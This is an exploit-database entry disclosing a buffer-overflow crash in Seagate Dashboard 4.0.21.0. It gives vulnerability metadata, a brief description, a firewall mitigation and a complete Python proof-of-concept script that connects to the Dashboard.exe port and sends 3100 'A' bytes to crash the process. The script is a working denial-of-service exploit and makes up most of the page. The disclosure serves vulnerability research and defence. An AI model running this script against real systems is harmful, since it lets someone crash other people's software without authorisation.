Crash PoC Seagate Dashboard 4.0.21.0

vendor:

Seagate Dashboard

by:

HexTitan

7.5

CVSS

HIGH

Buffer Overflow

120

CWE

Product Name: Seagate Dashboard

Affected Version From: 4.0.21.0

Affected Version To: 4.0.21.0

Patch Exists: NO

Related CWE: N/A

CPE: a:seagate:seagate_dashboard

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows 8.1 32bit

2015

Crash PoC Seagate Dashboard 4.0.21.0

The dasboard tool is part of the Seagate software solution for storage. The Dashboard.exe process opens a random port in the 5000-6000 range on each launch. The attached Python script will send 3100 A's to the target port. This will cause a crash in the Dashboard.exe process.

Mitigation:

Until a fix is available, firewall the Dashboard.exe process.

Source

Exploit-DB raw data:

#!/usr/bin/env python


# Exploit Title: Crash PoC Seagate Dashboard 4.0.21.0
# Date: 2015-06-20
# Exploit Author: HexTitan
# Vendor Homepage: http://www.seagate.com/
# Software Link: http://www.seagate.com/support/downloads/item/seagate-dashboard-windows-master-dl/
# Version: 4.0.21.0
# Tested on: Windows 8.1 32bit
#
#Description:
#
#The dasboard tool is part of the Seagate software solution for storage. The Dashboard.exe process opens a random port in the 5000-6000 range on each launch.
#
#PoC:
#
#The attached Python script will send 3100 A's to the target port. This will cause a crash in the Dashboard.exe process.
#
#
#Solution:
#
#Until a fix is available, firewall the Dashboard.exe process.

import socket
import sys
import os
 
target = '[ip]'
port = [port]

buffer = 'A'*3100


s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:
	connect = s.connect((target, port))
	print '[*] Connected to ' + target

except:
	print '[-] Unable to connect to ' + target
	sys.exit(0)

s.send(buffer)


print '[!] Malformed request sent\n'
s.close()